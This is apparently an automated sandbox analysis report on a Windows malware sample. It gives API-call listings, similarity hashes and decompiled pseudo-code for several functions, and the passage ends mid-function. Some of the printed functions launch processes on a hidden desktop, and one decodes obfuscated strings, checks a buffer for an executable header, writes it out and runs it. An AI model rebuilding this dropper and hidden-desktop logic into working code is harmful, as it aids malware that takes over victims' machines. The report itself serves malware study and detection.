0x00ea24e2
0x00ea24e5
0x00ea24e8
0x00000000
0x00ea24ee
0x00ea24ee
0x00000000
0x00ea24ee
0x00ea24e8
0x00ea24d0
0x00ea2495
0x00ea249c
0x00ea24a1
0x00ea24a7
0x00ea24a9
0x00ea24b0
0x00ea24f6
0x00ea24f9
0x00ea24fa
0x00ea24ff
0x00ea2502
0x00ea2505
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2505
0x00000000
0x00ea2493
0x00ea2334
0x00ea263a
0x00ea263a
0x00ea263c
0x00ea263f
0x00ea263f
0x00ea263f
0x00ea263f
0x00ea2651
0x00ea2653
0x00ea2654
0x00ea2655
0x00ea2661

APIs

GetConsoleCP.KERNEL32(8304488B,00E913E1,00000000), ref: 00EA22FE
__fassign.LIBCMT ref: 00EA24DD
__fassign.LIBCMT ref: 00EA24FA
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA2542
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EA2582
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA262E

Strings

F8A/, xrefs: 00EA22C1

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID: F8A/
API String ID: 4031098158-73971870
Opcode ID: a3678886d6fccbab7364de1feb0414ba15dcc719156a280bb0b822caa495e1fc
Instruction ID: 94258cc2c11ba5dd185e554b5cc5e4f25f23cfd6b5260bdba43d1aa0cb2c886f
Opcode Fuzzy Hash: a3678886d6fccbab7364de1feb0414ba15dcc719156a280bb0b822caa495e1fc
Instruction Fuzzy Hash: 68D1B871D012489FCF15CFA8C8809EDBBB5BF4E304F28516EE955BB242D631AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E94730, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E94730(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t146;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t161;
				signed int _t163;
				signed int _t164;
				intOrPtr _t166;
				signed int _t169;
				signed int _t170;
				signed int _t172;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t201;
				signed int _t204;
				void* _t209;
				intOrPtr* _t212;
				intOrPtr* _t213;
				signed int _t222;
				intOrPtr _t225;
				intOrPtr* _t226;
				signed int _t228;
				signed int* _t232;
				signed int _t233;
				void* _t238;
				void* _t240;
				signed int _t241;
				intOrPtr _t243;
				signed int _t249;
				signed int _t251;
				signed int _t254;
				signed int* _t255;
				intOrPtr* _t256;
				short _t257;
				signed int _t259;
				signed int _t261;
				void* _t263;
				void* _t265;

				_t259 = _t261;
				_t146 =  *0xea9014; // 0xa413846
				_v8 = _t146 ^ _t259;
				_push(__ebx);
				_t204 = _a8;
				_push(__esi);
				_push(__edi);
				_t243 = _a4;
				_v736 = _t204;
				_v724 = E00E9830D(_t209, _t238) + 0x278;
				_t153 = E00E93E03(_t204, _t243, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t263 = _t261 - 0x2e4 + 0x18;
				if(_t153 == 0) {
					L39:
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t204 + 2; // 0x6
					_t249 = _t10 << 4;
					_t156 =  &_v272;
					_v716 = _t249;
					_t212 =  *((intOrPtr*)(_t249 + _t243));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t251 = _v716;
						if( *_t156 !=  *_t212) {
							break;
						}
						if( *_t156 == 0) {
							L6:
							_t157 = _v704;
						} else {
							_t257 =  *((intOrPtr*)(_t156 + 2));
							_v706 = _t257;
							_t251 = _v716;
							if(_t257 !=  *((intOrPtr*)(_t212 + 2))) {
								break;
							} else {
								_t156 = _t156 + 4;
								_t212 = _t212 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t157 != 0) {
							_t213 =  &_v272;
							_t240 = _t213 + 2;
							do {
								_t158 =  *_t213;
								_t213 = _t213 + 2;
								__eflags = _t158 - _v704;
							} while (_t158 != _v704);
							_v720 = (_t213 - _t240 >> 1) + 1;
							_t161 = E00E96F1C(4 + ((_t213 - _t240 >> 1) + 1) * 2);
							_v732 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								goto L39;
							} else {
								_v728 =  *((intOrPtr*)(_t251 + _t243));
								_v740 =  *(_t243 + 0xa0 + _t204 * 4);
								_v744 =  *(_t243 + 8);
								_v708 = _t161 + 4;
								_t163 = E00E9604D(_t161 + 4, _v720,  &_v272);
								_t265 = _t263 + 0xc;
								__eflags = _t163;
								if(_t163 != 0) {
									_t164 = _v704;
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									E00E92919();
									asm("int3");
									_t166 =  *0xeaa53c; // 0x0
									return _t166;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t251 + _t243)) = _v708;
									if(_v272 != 0x43) {
										L17:
										_t169 = E00E93B10(_t204, _t243,  &_v700);
										_t222 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t222 = _v704;
											_t169 = _t222;
										}
									}
									 *(_t243 + 0xa0 + _t204 * 4) = _t169;
									__eflags = _t204 - 2;
									if(_t204 != 2) {
										__eflags = _t204 - 1;
										if(_t204 != 1) {
											__eflags = _t204 - 5;
											if(_t204 == 5) {
												 *((intOrPtr*)(_t243 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t243 + 0x10)) = _v712;
										}
									} else {
										_t255 = _v724;
										_t241 = _t222;
										_t232 = _t255;
										 *(_t243 + 8) = _v712;
										_v708 = _t255;
										_v720 = _t255[8];
										_v712 = _t255[9];
										while(1) {
											__eflags =  *(_t243 + 8) -  *_t232;
											if( *(_t243 + 8) ==  *_t232) {
												break;
											}
											_t256 = _v708;
											_t241 = _t241 + 1;
											_t201 =  *_t232;
											 *_t256 = _v720;
											_v712 = _t232[1];
											_t232 = _t256 + 8;
											 *((intOrPtr*)(_t256 + 4)) = _v712;
											_t204 = _v736;
											_t255 = _v724;
											_v720 = _t201;
											_v708 = _t232;
											__eflags = _t241 - 5;
											if(_t241 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t241 - 5;
											if(__eflags == 0) {
												_t192 = E00E9BFC9(_t204, _t243, _t255, __eflags, _v704, 1, 0xe74cd8, 0x7f,  &_v528,  *(_t243 + 8), 1);
												_t265 = _t265 + 0x1c;
												__eflags = _t192;
												if(_t192 == 0) {
													_t233 = _v704;
												} else {
													_t194 = _v704;
													do {
														 *(_t259 + _t194 * 2 - 0x20c) =  *(_t259 + _t194 * 2 - 0x20c) & 0x000001ff;
														_t194 = _t194 + 1;
														__eflags = _t194 - 0x7f;
													} while (_t194 < 0x7f);
													_t196 = L00E8E36D( &_v528,  *0xea90a0, 0xfe);
													_t265 = _t265 + 0xc;
													__eflags = _t196;
													_t233 = 0 | _t196 == 0x00000000;
												}
												_t255[1] = _t233;
												 *_t255 =  *(_t243 + 8);
											}
											 *(_t243 + 0x18) = _t255[1];
											goto L37;
										}
										__eflags = _t241;
										if(_t241 != 0) {
											 *_t255 =  *(_t255 + _t241 * 8);
											_t255[1] =  *(_t255 + 4 + _t241 * 8);
											 *(_t255 + _t241 * 8) = _v720;
											 *(_t255 + 4 + _t241 * 8) = _v712;
										}
										goto L25;
									}
									L37:
									_t170 = _t204 * 0xc;
									_t106 = _t170 + 0xe74d60; // 0xe869c7
									 *0xea72b4(_t243);
									_t172 =  *((intOrPtr*)( *_t106))();
									_t225 = _v728;
									__eflags = _t172;
									if(_t172 == 0) {
										__eflags = _t225 - 0xea93d8;
										if(_t225 != 0xea93d8) {
											_t254 = _t204 + _t204;
											__eflags = _t254;
											asm("lock xadd [eax], ecx");
											if(_t254 != 0) {
												goto L44;
											} else {
												E00E964B8( *((intOrPtr*)(_t243 + 0x28 + _t254 * 8)));
												E00E964B8( *((intOrPtr*)(_t243 + 0x24 + _t254 * 8)));
												E00E964B8( *(_t243 + 0xa0 + _t204 * 4));
												_t228 = _v704;
												 *(_v716 + _t243) = _t228;
												 *(_t243 + 0xa0 + _t204 * 4) = _t228;
											}
										}
										_t226 = _v732;
										 *_t226 = 1;
										 *((intOrPtr*)(_t243 + 0x28 + (_t204 + _t204) * 8)) = _t226;
									} else {
										 *((intOrPtr*)(_v716 + _t243)) = _t225;
										E00E964B8( *(_t243 + 0xa0 + _t204 * 4));
										 *(_t243 + 0xa0 + _t204 * 4) = _v740;
										E00E964B8(_v732);
										 *(_t243 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							L40:
							return E00E8AE43(_v8 ^ _t259);
						}
						goto L48;
					}
					asm("sbb eax, eax");
					_t157 = _t156 | 0x00000001;
					__eflags = _t157;
					goto L8;
				}
				L48:
			}

0x00e94733
0x00e9473b
0x00e94742
0x00e94745
0x00e94746
0x00e94749
0x00e9474d
0x00e9474e
0x00e94751
0x00e94761
0x00e94784
0x00e94789
0x00e9478e
0x00e94a66
0x00e94a66
0x00000000
0x00e94794
0x00e94794
0x00e94797
0x00e9479a
0x00e947a0
0x00e947a9
0x00e947ab
0x00e947ae
0x00e947b8
0x00e947be
0x00000000
0x00000000
0x00e947c4
0x00e947ed
0x00e947ed
0x00e947c6
0x00e947c6
0x00e947ce
0x00e947d5
0x00e947db
0x00000000
0x00e947dd
0x00e947dd
0x00e947e0
0x00e947eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00e947eb
0x00e947db
0x00e947fa
0x00e947fc
0x00e94805
0x00e9480b
0x00e9480e
0x00e9480e
0x00e94811
0x00e94814
0x00e94814
0x00e94824
0x00e94832
0x00e94837
0x00e9483e
0x00e94840
0x00000000
0x00e94846
0x00e9484c
0x00e94859
0x00e94862
0x00e94875
0x00e9487c
0x00e94881
0x00e94884
0x00e94886
0x00e94ae8
0x00e94aee
0x00e94aef
0x00e94af0
0x00e94af1
0x00e94af2
0x00e94af3
0x00e94af8
0x00e94af9
0x00e94aff
0x00e9488c
0x00e9488c
0x00e9489a
0x00e9489d
0x00e948b3
0x00e948ba
0x00e948c0
0x00e9489f
0x00e9489f
0x00e948a7
0x00000000
0x00e948a9
0x00e948a9
0x00e948af
0x00e948af
0x00e948a7
0x00e948c6
0x00e948cd
0x00e948d0
0x00e949f0
0x00e949f3
0x00e94a00
0x00e94a03
0x00e94a0b
0x00e94a0b
0x00e949f5
0x00e949fb
0x00e949fb
0x00e948d6
0x00e948d6
0x00e948dc
0x00e948e4
0x00e948e6
0x00e948e9
0x00e948f2
0x00e948fb
0x00e94901
0x00e94904
0x00e94906
0x00000000
0x00000000
0x00e94908
0x00e9490e
0x00e9490f
0x00e9491a
0x00e94922
0x00e9492a
0x00e9492d
0x00e94930
0x00e94936
0x00e9493c
0x00e94942
0x00e94948
0x00e9494b
0x00000000
0x00000000
0x00e9494d
0x00e94972
0x00e94972
0x00e94975
0x00e94992
0x00e94997
0x00e9499a
0x00e9499c
0x00e949da
0x00e9499e
0x00e9499e
0x00e949a4
0x00e949a9
0x00e949b1
0x00e949b2
0x00e949b2
0x00e949c9
0x00e949d0
0x00e949d3
0x00e949d5
0x00e949d5
0x00e949e0
0x00e949e6
0x00e949e6
0x00e949eb
0x00000000
0x00e949eb
0x00e9494f
0x00e94951
0x00e94956
0x00e9495c
0x00e94965
0x00e9496e
0x00e9496e
0x00000000
0x00e94951
0x00e94a0e
0x00e94a0e
0x00e94a12
0x00e94a1a
0x00e94a20
0x00e94a23
0x00e94a29
0x00e94a2b
0x00e94a79
0x00e94a7f
0x00e94a86
0x00e94a86
0x00e94a8c
0x00e94a90
0x00000000
0x00e94a92
0x00e94a96
0x00e94a9f
0x00e94aab
0x00e94ab9
0x00e94abf
0x00e94ac2
0x00e94ac2
0x00e94a90
0x00e94ad1
0x00e94ad9
0x00e94ae2
0x00e94a2d
0x00e94a33
0x00e94a3d
0x00e94a4f
0x00e94a56
0x00e94a63
0x00000000
0x00e94a63
0x00000000
0x00e94a2b
0x00e94886
0x00e947fe
0x00e94a68
0x00e94a78
0x00e94a78
0x00000000
0x00e947fc
0x00e947f5
0x00e947f7
0x00e947f7
0x00000000
0x00e947f7
0x00000000

APIs

Part of subcall function 00E9830D: GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
Part of subcall function 00E9830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

_free.LIBCMT ref: 00E94A3D
_free.LIBCMT ref: 00E94A56
_free.LIBCMT ref: 00E94A96
_free.LIBCMT ref: 00E94A9F
_free.LIBCMT ref: 00E94AAB

Strings

C, xrefs: 00E9488C
F8A/, xrefs: 00E9473B

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C$F8A/
API String ID: 3291180501-3069753401
Opcode ID: 000f822541c936330e4cfffe8a766c8b26a942dba1a939d2971f09faa53372f6
Instruction ID: 9048b6a37d96867140aff496b0e2d2d8e0f559caf94e3b854a1c51b2d64f4944
Opcode Fuzzy Hash: 000f822541c936330e4cfffe8a766c8b26a942dba1a939d2971f09faa53372f6
Instruction Fuzzy Hash: F9B129B5A0121A9FDF24DF18C884AADB7B4FB49304F1045EAE949B7390E771AE91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00E85A71, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00E85A71(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v10;
				short _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v100;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v156;
				CHAR* _v160;
				struct _PROCESS_INFORMATION* _v176;
				struct HINSTANCE__* _v180;
				struct tagOFNA _v188;
				signed int _t28;
				CHAR* _t31;
				struct HINSTANCE__* _t34;
				CHAR* _t51;
				struct tagOFNA _t56;
				long _t58;
				CHAR* _t61;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t65 = (_t63 & 0xfffffff8) - 0xbc;
				_t28 =  *0xea9014; // 0xa413846
				_v8 = _t28 ^ _t65;
				SetThreadDesktop( *0xeaae3c);
				_push(0x105);
				_t31 = E00E909A2();
				_t56 = 0x58;
				_t61 = _t31;
				E00E8D0F0(_t56,  &_v188, 0, _t56);
				_t66 = _t65 + 0x10;
				_v188 = _t56;
				_t34 = GetModuleHandleA(0);
				asm("movaps xmm0, [0xe7de40]");
				_t51 = 0;
				_v180 = _t34;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x50;
				do {
					_t6 = _t51 + 0x40; // 0x40
					 *(_t66 + _t51 + 0xb0) =  *(_t66 + _t51 + 0xb0) ^ _t6;
					_t51 = _t51 + 1;
				} while (_t51 < 0x11);
				asm("movaps xmm0, [0xe7de10]");
				_v176 =  &_v28;
				_v160 = _t61;
				_v156 = 0x104;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x3f25;
				_v10 = 0;
				_v140 = E00E827A4( &_v28);
				_v136 = 0x1000;
				if(GetOpenFileNameA( &_v188) != 0) {
					_t58 = 0x44;
					E00E8D0F0(_t58,  &_v100, 0, _t58);
					_v100.cb = _t58;
					_v100.lpDesktop = 0xea99c0;
					asm("stosd");
					_t66 = _t66 + 0xc;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					CreateProcessA(_t61, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
				}
				return E00E8AE43(_v8 ^ _t66);
			}

0x00e85a77
0x00e85a7d
0x00e85a84
0x00e85a94
0x00e85a9a
0x00e85a9f
0x00e85aa6
0x00e85aa8
0x00e85ab2
0x00e85ab7
0x00e85aba
0x00e85abf
0x00e85ac5
0x00e85acc
0x00e85ace
0x00e85ad2
0x00e85ada
0x00e85ae4
0x00e85ae4
0x00e85ae7
0x00e85aee
0x00e85aef
0x00e85af4
0x00e85b09
0x00e85b0d
0x00e85b11
0x00e85b19
0x00e85b21
0x00e85b2b
0x00e85b37
0x00e85b40
0x00e85b50
0x00e85b54
0x00e85b5c
0x00e85b61
0x00e85b6e
0x00e85b76
0x00e85b77
0x00e85b7a
0x00e85b7b
0x00e85b7c
0x00e85b92
0x00e85b92
0x00e85bae

APIs

SetThreadDesktop.USER32 ref: 00E85A94
GetModuleHandleA.KERNEL32(00000000), ref: 00E85ABF
GetOpenFileNameA.COMDLG32(?), ref: 00E85B48
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E85B92

Strings

%?, xrefs: 00E85B21
F8A/, xrefs: 00E85A7D
Tett, xrefs: 00E85B6E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDesktopFileHandleModuleNameOpenProcessThread
String ID: %?$F8A/$Tett
API String ID: 633583800-1646577050
Opcode ID: d12a10f46619fe1c68fe833d416f7bee3b81dba5e03261f3c91467cfc3dab416
Instruction ID: 809ce58e4f29f86bd9c425d9b95f2d860a1bfaa7ff33531926cbe541bee7adbf
Opcode Fuzzy Hash: d12a10f46619fe1c68fe833d416f7bee3b81dba5e03261f3c91467cfc3dab416
Instruction Fuzzy Hash: 22318B725083849FE320DF69DC45B9BBBE9FFD9300F000A2EE69896161E7709548CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00E88CE5, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E88CE5(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				short _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				void* __ebp;
				signed int _t23;
				char* _t26;
				char* _t30;
				char* _t33;
				signed int _t56;
				void* _t59;

				_t43 = __ecx;
				_t23 =  *0xea9014; // 0xa413846
				_v8 = _t23 ^ _t56;
				_t55 = __edx;
				_t59 = __ecx;
				if(_t59 == 0) {
					_t26 = E00E889B2(__ebx, __edx, __edi, __edx, _t56, __edx,  &_v32);
					if(_v32 > 0x400 &&  *_t26 == 0x4d &&  *((char*)(_t26 + 1)) == 0x5a) {
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						E00E88B64(E00E82D10( &_v24), _t26, _v32);
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						_v32 = 0x2d27312f;
						_v28 = 0;
						_t30 = E00E82D10( &_v24);
						_t21 =  &_v32; // 0x2d27312f
						ShellExecuteA(0, E00E832BE(_t21), _t30, 0, 0, 0);
					}
				} else {
					if(_t59 > 0) {
						if(__ecx <= 2) {
							_t33 = StrChrA(__edx, 0x3a);
							if(_t33 != 0) {
								 *_t33 = 0;
								E00E86268(_t55, E00E925D7(_t43,  &(_t33[1]), 0, 0xa));
							}
						} else {
							if(__ecx == 4) {
								_v24 = 0x6160007;
								_v20 = 0x1403081b;
								_v16 = 0xe0d081b;
								_v12 = 0;
								MessageBoxA(0, _t55, E00E82810( &_v24), 0);
							}
						}
					}
				}
				return E00E8AE43(_v8 ^ _t56);
			}

0x00e88ce5
0x00e88ceb
0x00e88cf2
0x00e88cf7
0x00e88cf9
0x00e88cfb
0x00e88d77
0x00e88d83
0x00e88d96
0x00e88d9e
0x00e88da7
0x00e88db3
0x00e88dbe
0x00e88dc5
0x00e88dcc
0x00e88dd2
0x00e88dd9
0x00e88ddc
0x00e88de2
0x00e88dec
0x00e88dec
0x00e88cfd
0x00e88cfd
0x00e88d06
0x00e88d45
0x00e88d4d
0x00e88d57
0x00e88d68
0x00e88d68
0x00e88d08
0x00e88d0b
0x00e88d13
0x00e88d1e
0x00e88d25
0x00e88d2c
0x00e88d37
0x00e88d37
0x00e88d0b
0x00e88d06
0x00e88cfd
0x00e88dff

APIs

MessageBoxA.USER32 ref: 00E88D37
StrChrA.SHLWAPI(?,0000003A), ref: 00E88D45
ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E88DEC

Strings

(k#?, xrefs: 00E88DC5
-, xrefs: 00E88DCC
F8A/, xrefs: 00E88CEB
/1'-, xrefs: 00E88D90

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMessageShell
String ID: (k#?$-$/1'-$F8A/
API String ID: 649218774-1100103194
Opcode ID: 91cc15d93bd9aa6ee050561c902f3c3496ae192893aa9197a4889844bdfa417d
Instruction ID: 03beb0ef13b777660b42c30cd06e300f54b462e23bd34482d823a4e715b59cd5
Opcode Fuzzy Hash: 91cc15d93bd9aa6ee050561c902f3c3496ae192893aa9197a4889844bdfa417d
Instruction Fuzzy Hash: 2131B3B0D01219EEDB04FBA49E84ABF7BFCEF15308F505419E90E72181DB344E088B66

Uniqueness

Uniqueness Score: -1.00%

Function 00E9AADF, Relevance: 12.2, APIs: 8, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E9AADF(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t97;
				intOrPtr* _t98;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00E8CCD0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						L38:
						 *((intOrPtr*)(E00E95BBD())) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(_t59 == _t146) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xeaa510 - _t110; // 0xfcf210
							if(__eflags != 0) {
								L14:
								_t64 =  *0xeaa510; // 0xfcf210
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00E9ADEB(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00E9DE67(_t120, _t139, 4);
													E00E964B8(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00E964B8( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00E9DE67(_t139, _t138, 4);
												E00E964B8(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xeaa510 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00E998AF(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00E964B8(_t149);
													goto L40;
												} else {
													_t76 = E00E96383(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00E92919();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00E998AF(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00E95E69(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00E964B8(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00E998AF(_t53, 1);
																		E00E964B8(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00E96383( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00E92919();
																				asm("int3");
																				_t84 =  *0xeaa510; // 0xfcf210
																				__eflags = _t84 -  *0xeaa51c; // 0xfcf210
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0xeaa510 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
